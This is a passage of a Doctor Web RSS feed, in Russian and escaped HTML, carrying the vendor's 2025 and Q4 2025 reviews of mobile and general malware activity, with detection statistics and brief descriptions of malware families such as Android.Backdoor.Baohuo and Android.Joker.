href="https://vms.drweb.ru/search/?q=Android.Banker&amp;lng=ru"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. В то же время активность банкеров &lt;b&gt;Android.SpyMax&lt;/b&gt; наоборот снизилась.&lt;/p&gt;

&lt;p&gt;В минувшем году вирусописатели продолжили использовать различные техники защиты вредоносного ПО для ОС Android. Одной из них был метод конвертации DEX-кода в C-код (известен как DCC или DEX to C).&lt;/p&gt;

&lt;p&gt;Самыми распространенными нежелательными приложениями стали программы &lt;a href="https://vms.drweb.ru/search/?q=Program.FakeMoney&amp;lng=ru"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;. Они предлагают пользователям за виртуальные награды выполнять различные задания и обещают возможность конвертировать вознаграждение в настоящие деньги. Но самом деле в них такой возможности нет. Кроме того, на защищаемых устройствах часто детектировались приложения &lt;a href="https://vms.drweb.ru/search/?q=Program.FakeAntiVirus&amp;lng=ru"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Program.CloudInject&amp;lng=ru"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;. Первые имитируют работу антивирусов и обнаруживают несуществующие угрозы, предлагая «вылечить» заражение, купив полную версию ПО. Вторые представляют собой приложения, которые были модифицированы через популярный облачный сервис. При модификации к ним добавляются опасные системные разрешения и обфусцированный код, назначение которого нельзя проконтролировать.&lt;/p&gt;

&lt;p&gt;Программы, которые были модифицированы при помощи утилиты NP Manager (детектируются как &lt;b&gt;Tool.NPMod&lt;/b&gt;), стали самым распространенным потенциально опасным ПО. Утилита обфусцирует код модифицируемых приложений и позволяет обходить проверку их цифровой подписи. Наиболее активными рекламными программами в 2025 году были сторонние модификации WhatsApp (&lt;a href="https://vms.drweb.ru/search/?q=Adware.ModAd&amp;lng=ru"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;), которые автоматически открывают рекламные ссылки при работе с мессенджером.&lt;/p&gt;

&lt;p&gt;В 2025 году были выявлены новые случаи заражения прошивок Android-устройств. Об одном из них наша компания уведомила в апреле. Злоумышленники предустановили вредоносное приложение &lt;a href="https://vms.drweb.ru/search/?q=Android.Clipper.31&amp;lng=ru"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; в системную область нескольких бюджетных моделей смартфонов и с его помощью похищали криптовалюту пользователей. Еще одним атакующим удалось внедрить опасных троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.Triada&amp;lng=ru"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; в прошивку других моделей Android-смартфонов. Кроме того, были зафиксированы очередные случаи заражения прошивок TV-приставок под управлением Android новыми версиями трояна &lt;a href="https://vms.drweb.ru/search/?q=Android.Vo1d&amp;lng=ru"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, которого наша компания &lt;a href="https://news.drweb.ru/show/?i=14900&amp;lng=ru" target="_blank"&gt;обнаружила&lt;/a&gt; в 2024 году.&lt;/p&gt;

&lt;p&gt;В течение минувшего года антивирусная лаборатория «Доктор Веб» выявила ряд опасных вредоносных приложений. В апреле мы рассказали о трояне &lt;a href="https://vms.drweb.ru/search/?q=Android.Spy.1292.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, который скрывался в модифицированной вирусописателями картографической программе Alpine Quest и атаковал российских военнослужащих. &lt;a href="https://vms.drweb.ru/search/?q=Android.Spy.1292.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; передавал злоумышленникам данные о номере мобильного телефона и учетных записях, собирал контакты из телефонной книги, геолокацию зараженного устройства и сведения о хранящихся на нем файлах. Он также мог похищать определенные файлы по команде атакующих. Тех в первую очередь интересовали конфиденциальные документы, которые передавались через мессенджеры, а также файл журнала локаций программы Alpine Quest.&lt;/p&gt;

&lt;p&gt;В августе наши специалисты предупредили о бэкдоре &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.916.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, которого под видом антивируса злоумышленники распространяли через личные сообщения в мессенджерах. &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.916.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; крадет конфиденциальную информацию и позволяет следить за пользователями. Основной целью этого бэкдора стали сотрудники российского бизнеса.&lt;/p&gt;

&lt;p&gt;В октябре мы рассказали о многофункциональном бэкдоре &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, которого наши вирусные аналитики обнаружили в модифицированных версиях мессенджера Telegram X. Эта вредоносная программа также используется для кражи конфиденциальных данных, включая логины и пароли от Telegram, входящие СМС, переписку в мессенджере и данные из буфера обмена. При этом бэкдор позволяет злоумышленникам полностью управлять мессенджером и контролировать взломанную учетную запись Telegram жертвы. Для управления бэкдором киберпреступники использовали как C2-сервер, так и базу данных Redis, что ранее не встречалось в Android-угрозах. &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; преимущественно был нацелен на жителей Индонезии и Бразилии.&lt;/p&gt;

&lt;p&gt;Более подробно о вирусной обстановке для мобильных устройств в 2025 году читайте в нашем &lt;a href="https://news.drweb.ru/show/?i=15104" target="_blank"&gt;обзоре&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;Перспективы и вероятные тенденции&lt;/h3&gt;

&lt;p&gt;В новом, 2026 году одной из наиболее распространенных угроз для пользователей, вероятно, останутся рекламные трояны, с помощью которых злоумышленники получают нелегальный доход. Стоит ожидать, что киберпреступники станут чаще использовать банковские троянские приложения, которые также позволяют обогащаться киберпреступникам.&lt;/p&gt;

&lt;p&gt;Возможен дальнейший рост популярности различных инструментов и методик, помогающих скрывать вредоносную активность. Среди них можно отметить использование упаковщиков и обфускаторов, применение вредоносных программ-дропперов и многоступенчатых загрузчиков, а также использование стеганографии для сокрытия полезной нагрузки. Кроме того, при создании вредоносного ПО киберпреступники, в том числе с небольшим опытом в программировании, все чаще будут прибегать к помощи ИИ-ассистентов. В результате появятся новые семейства вредоносных программ, а количество угроз возрастет.&lt;/p&gt;

&lt;p&gt;Под прицелом вновь окажутся государственные и корпоративные структуры, что выльется в очередные таргетированные атаки. Также вероятны новые случаи заражения прошивок Android-смартфонов, ТВ-приставок и других типов мобильных устройств, особенно в бюджетном сегменте. Сохранится активность интернет-мошенников.&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15101&amp;lng=ru</guid><title>«Доктор Веб»: обзор вирусной активности для мобильных устройств в IV квартале 2025 года</title><link>https://news.drweb.ru/show/?i=15101&amp;lng=ru&amp;c=5</link><pubDate>Mon, 12 Jan 2026 00:00:00 GMT</pubDate><description>&lt;div class="vir_rev_btn center justify-center"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/mobile_virus_review_Q4_ru.pdf" class='btn'&gt;Скачать PDF&lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;12 января 2026 года&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Согласно данным статистики детектирований Dr.Web Security Space для мобильных устройств, в IV квартале 2025 года самыми распространенными Android-угрозами вновь стали рекламные трояны &lt;a href="https://vms.drweb.ru/search/?q=Android.MobiDash&amp;lng=ru"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, демонстрирующие надоедливые объявления. При этом их активность снизилась: первые обнаруживались на защищаемых устройствах на 43,24% реже, а вторые — на 18,06%. За ними расположились трояны семейства &lt;b&gt;Android.Siggen&lt;/b&gt;, которые включают вредоносные приложения, обладающие различной функциональностью. Они также детектировались несколько реже — на 27,47%.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;В то же время отмечался заметный рост активности банковских троянов, с которыми пользователи сталкивались чаще на 65,52%. Этот рост произошел в большей степени за счет представителей семейства &lt;a href="https://vms.drweb.ru/search/?q=Android.Banker&amp;lng=ru"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. Такие вредоносные программы перехватывают СМС с одноразовыми кодами для подтверждения банковских операций, а также могут имитировать внешний вид настоящего банковского ПО и демонстрировать фишинговые окна.&lt;/p&gt;

&lt;p&gt;Среди нежелательного ПО наибольшее распространение получили Android-программы, модифицированные через облачный сервис CloudInject (антивирус Dr.Web детектирует их как &lt;a href="https://vms.drweb.ru/search/?q=Program.CloudInject&amp;lng=ru"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;). С его помощью в приложения добавляются опасные системные разрешения и обфусцированный код, функциональность которого невозможно проконтролировать. Кроме того, на устройствах часто встречались поддельные антивирусы &lt;a href="https://vms.drweb.ru/search/?q=Program.FakeAntiVirus&amp;lng=ru"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;, которые обнаруживают несуществующие угрозы и для их «лечения» требуют приобрести полную версию, а также &lt;a href="https://vms.drweb.ru/search/?q=Program.FakeMoney&amp;lng=ru"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt; — приложения, якобы позволяющие зарабатывать на выполнении различных заданий.&lt;/p&gt;

&lt;p&gt;Самым распространенным потенциально опасным ПО в IV квартале стали приложения &lt;b&gt;Tool.NPMod&lt;/b&gt;, модифицированные при помощи утилиты NP Manager. Она обфусцирует код модов и добавляет в них специальный модуль, позволяющий обходить проверку цифровой подписи после модификации приложений. Среди рекламных программ лидерство сохранили представители семейства &lt;a href="https://vms.drweb.ru/search/?q=Adware.Adpush&amp;lng=ru"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;. Это специальные программные модули, которые разработчики встраивают в ПО для демонстрации рекламных уведомлений.&lt;/p&gt;

&lt;p&gt;В октябре наши специалисты &lt;a href="https://news.drweb.ru/show/?i=15076&amp;lng=ru" target="_blank"&gt;рассказали&lt;/a&gt; об опасном бэкдоре &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, который злоумышленники встроили в неофициальные модификации мессенджера Telegram X и распространяли как через вредоносные сайты, так и через сторонние каталоги Android-приложений. Вредоносная программа похищает логины и пароли от учетных записей Telegram, а также другие конфиденциальные данные. Кроме того, с ее помощью киберпреступники фактически способны управлять аккаунтом жертвы и незаметно выполнять в мессенджере различные действия от ее имени. Например — присоединяться к Telegram-каналам и выходить из них, скрывать новые авторизованные устройства, скрывать определенные сообщения и т. д. &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; управляется в том числе через базу данных Redis, что ранее не встречалось в Android-угрозах. В общей сложности бэкдор заразил порядка 58 000 устройств, среди которых около 3 000 различных моделей смартфонов, планшетов, ТВ-приставок и автомобилей с бортовыми компьютерами на базе Android.&lt;/p&gt;

&lt;p&gt;За минувший квартал антивирусная лаборатория компании «Доктор Веб» выявила в каталоге Google Play новые вредоносные программы, среди которых были трояны &lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, подписывающие жертв на платные услуги, и различные программы-подделки &lt;a href="https://vms.drweb.ru/search/?q=Android.FakeApp&amp;lng=ru"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, применяемые в мошеннических схемах. В общей сложности их загрузили по меньшей мере 263 000 раз.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Главные тенденции IV квартала&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Рекламные трояны остаются наиболее распространенными Android-угрозами&lt;/li&gt;
        &lt;li&gt;Рост числа атак банковских троянов&lt;/li&gt;
        &lt;li&gt;Распространение опасного бэкдора &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, встроенного в модификации мессенджера Telegram X&lt;/li&gt;
        &lt;li&gt;Появление очередных вредоносных приложений в каталоге Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;По данным Dr.Web Security Space для мобильных устройств&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/01_malware_q4_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/01_malware_q4_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.MobiDash&amp;lng=ru"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троянская программа, показывающая надоедливую рекламу. Она представляет собой программный модуль, который разработчики ПО встраивают в приложения.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.FakeApp&amp;lng=ru"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троянская программа, которая загружает указанный в ее настройках веб-сайт. Известные модификации этого вредоносного приложения загружают сайт онлайн-казино.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.Click&amp;lng=ru"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование вредоносных модов мессенджера WhatsApp, которые незаметно для пользователя могут загружать различные сайты в фоновом режиме.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Packed.57.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование обфускатора, который в том числе используется для защиты вредоносных приложений (например, некоторых версий банковских троянов &lt;b&gt;Android.SpyMax&lt;/b&gt;).&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.Triada&amp;lng=ru"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5847&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование упаковщика для троянов семейства &lt;a href="https://vms.drweb.ru/search/?q=Android.Triada&amp;lng=ru"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;, предназначенного для их защиты от анализа и обнаружения. Чаще всего злоумышленники используют его совместно с вредоносными модами мессенджера Telegram, в которые непосредственно встроены эти трояны.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/02_unwanted_q_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/02_unwanted_q_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.CloudInject&amp;lng=ru"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.CloudInject&amp;lng=ru"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование Android-приложений, модифицированных при помощи облачного сервиса CloudInject и одноименной Android-утилиты (добавлена в вирусную базу Dr.Web как &lt;a href="https://vms.drweb.ru/search/?q=Tool.CloudInject&amp;lng=ru"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Такие программы модифицируются на удаленном сервере, при этом заинтересованный в их изменении пользователь (моддер) не контролирует, что именно будет в них встроено. Кроме того, приложения получают набор опасных разрешений. После модификации программ у моддера появляется возможность дистанционно управлять ими: блокировать, показывать настраиваемые диалоги, отслеживать факт установки и удаления другого ПО и т. д.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.FakeAntiVirus&amp;lng=ru"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование рекламных программ, которые имитируют работу антивирусного ПО. Такие программы могут сообщать о несуществующих угрозах и вводить пользователей в заблуждение, требуя оплатить покупку полной версии.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.FakeMoney&amp;lng=ru"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование приложений, якобы позволяющих зарабатывать на выполнении тех или иных действий или заданий. Эти программы имитируют начисление вознаграждений, причем для вывода «заработанных» денег требуется накопить определенную сумму. Обычно в них имеется список популярных платежных систем и банков, через которые якобы возможно перевести награды. Но даже когда пользователям удается накопить достаточную для вывода сумму, обещанные выплаты не поступают. Этой записью также детектируется другое нежелательное ПО, основанное на коде таких программ.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Программа для наблюдения за владельцами Android-устройств. Она позволяет читать СМС, получать информацию о телефонных вызовах, отслеживать местоположение устройства и выполнять аудиозапись окружения.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/03_riskware_q4_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/03_riskware_q4_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование Android-приложений, модифицированных при помощи утилиты NP Manager. В такие программы внедрен специальный модуль, который позволяет обойти проверку цифровой подписи после их модификации.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Tool.LuckyPatcher&amp;lng=ru"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Утилита, позволяющая модифицировать установленные Android-приложения (создавать для них патчи) с целью изменения логики их работы или обхода тех или иных ограничений. Например, с ее помощью пользователи могут попытаться отключить проверку root-доступа в банковских программах или получить неограниченные ресурсы в играх. Для создания патчей утилита загружает из интернета специально подготовленные скрипты, которые могут создавать и добавлять в общую базу все желающие. Функциональность таких скриптов может оказаться в том числе и вредоносной, поэтому создаваемые патчи могут представлять потенциальную опасность.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Tool.Androlua&amp;lng=ru"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование ряда потенциально опасных версий специализированного фреймворка для разработки Android-программ на скриптовом языке программирования Lua. Основная логика Lua-приложений расположена в соответствующих скриптах, которые зашифрованы и расшифровываются интерпретатором перед выполнением. Часто данный фреймворк по умолчанию запрашивает доступ ко множеству системных разрешений для работы. В результате исполняемые через него Lua-скрипты способны выполнять различные вредоносные действия в соответствии с полученными разрешениями.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/04_adware_q4_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/04_adware_q4_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Adware.AdPush&amp;lng=ru"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Adware.Adpush&amp;lng=ru"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Рекламные модули, которые могут быть интегрированы в Android-программы. Они демонстрируют рекламные уведомления, вводящие пользователей в заблуждение. Например, такие уведомления могут напоминать сообщения от операционной системы. Кроме того, эти модули собирают ряд конфиденциальных данных, а также способны загружать другие приложения и инициировать их установку.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Bastion.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование программ-оптимизаторов, которые периодически создают уведомления с вводящими в заблуждение сообщениями о якобы нехватке памяти и ошибках системы с целью показывать рекламу во время «оптимизации».&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Airpush.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Программные модули, встраиваемые в Android-приложения и демонстрирующие разнообразную рекламу. В зависимости от версии и модификации это могут быть рекламные уведомления, всплывающие окна или баннеры. С помощью данных модулей злоумышленники часто распространяют вредоносные программы, предлагая установить то или иное ПО. Кроме того, такие модули передают на удаленный сервер различную конфиденциальную информацию.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Adware.ModAd&amp;lng=ru"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование некоторых модифицированных версий (модов) мессенджера WhatsApp, в функции которых внедрен код для загрузки заданных ссылок через веб-отображение во время работы с мессенджером. С этих интернет-адресов выполняется перенаправление на рекламируемые сайты, например онлайн-казино и букмекеров, сайты для взрослых.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Угрозы в Google Play&lt;/h3&gt;

&lt;p&gt;В течение IV квартала 2025 года вирусные аналитики компании «Доктор Веб» зафиксировали появление в каталоге Google Play более двух десятков вредоносных приложений &lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, предназначенных для подписки пользователей на платные услуги. Злоумышленники замаскировали их под различное ПО: мессенджеры, утилиты для оптимизации работы системы, графические редакторы и программы для просмотра фильмов.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/05_Android.Joker_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/05_Android.Joker_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Примеры выявленных вредоносных программ &lt;b&gt;Android.Joker&lt;/b&gt;. &lt;b&gt;Android.Joker.2496&lt;/b&gt; был замаскирован под инструмент Useful Cleaner для «очистки мусора» на телефоне, а одна из модификаций &lt;b&gt;Android.Joker.2495&lt;/b&gt; — под проигрыватель фильмов Reel Drama&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Также наши специалисты обнаружили несколько новых программ-подделок из семейства &lt;a href="https://vms.drweb.ru/search/?q=Android.FakeApp&amp;lng=ru"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;. Как и ранее, некоторые из них распространились под видом финансовых приложений и загружали мошеннические сайты. Другие такие подделки выдавались за игры. При определенных условиях (например, если IP-адрес пользователя удовлетворял требованиям злоумышленников) они могли загружать сайты букмекерских контор и онлайн-казино.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/06_Android.FakeApp.1910_1_Chicken_Road_Fun.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/06_Android.FakeApp.1910_1_Chicken_Road_Fun.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Игра Chicken Road Fun являлась программой-подделкой &lt;b&gt;Android.FakeApp.1910&lt;/b&gt;, и вместо того, чтобы предоставить ожидаемую пользователем функциональность, могла загрузить сайт онлайн-казино&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q4%202025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15099&amp;lng=ru</guid><title>«Доктор Веб»: обзор вирусной активности в IV квартале 2025 года</title><link>https://news.drweb.ru/show/?i=15099&amp;lng=ru&amp;c=5</link><pubDate>Mon, 12 Jan 2026 00:00:00 GMT</pubDate><description>&lt;div class="vir_rev_btn center justify-center"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/virus_review_Q4_ru.pdf" class='btn'&gt;Скачать PDF&lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;12 января 2026 года&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Согласно статистике детектирований антивируса Dr.Web, в IV квартале 2025 года общее число обнаруженных угроз увеличилось на 16,05% по сравнению с III кварталом. Число уникальных угроз при этом снизилось на 1,13%. Наибольшее распространение получили нежелательные рекламные приложения, вредоносные скрипты и различные вредоносные программы, в том числе загрузчики и рекламные трояны.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;В почтовом трафике чаще всего детектировались троянские приложения, среди которых были загрузчики, похитители паролей и дропперы. Кроме того, через электронные письма распространялись эксплойты, бэкдоры и всевозможные вредоносные скрипты.&lt;/p&gt;

&lt;p&gt;Пользователи, чьи файлы были затронуты троянами-шифровальщиками, чаще всего сталкивались с энкодерами &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Trojan.Encoder.29750&amp;lng=ru"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;В октябре мы &lt;a href="https://news.drweb.ru/show/?i=15076&amp;lng=ru" target="_blank"&gt;рассказали&lt;/a&gt; о бэкдоре для Android-устройств &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, которого киберпреступники распространяют в составе модифицированных версий мессенджера Telegram X. Эта вредоносная программа похищает логины и пароли от учетных записей Telegram и другие конфиденциальные данные. С ее помощью вирусописатели могут управлять взломанными аккаунтами жертв и полностью контролировать сам мессенджер, выполняя различные действия от имени пользователей.&lt;/p&gt;

&lt;p&gt;В ноябре наша антивирусная лаборатория опубликовала &lt;a href="https://news.drweb.ru/show/?i=15078&amp;lng=ru" target="_blank"&gt;исследование&lt;/a&gt; таргетированной атаки, совершенной хакерской группировкой Cavalry Werewolf на российское государственное учреждение. В ходе проведенной экспертизы специалисты «Доктор Веб» выявили множество вредоносных инструментов злоумышленников, в том числе инструменты с открытым исходным кодом, которые киберпреступники применяют в своих кампаниях. Были также изучены особенности группировки и характерные для нее действия внутри скомпрометированных сетей.&lt;/p&gt;

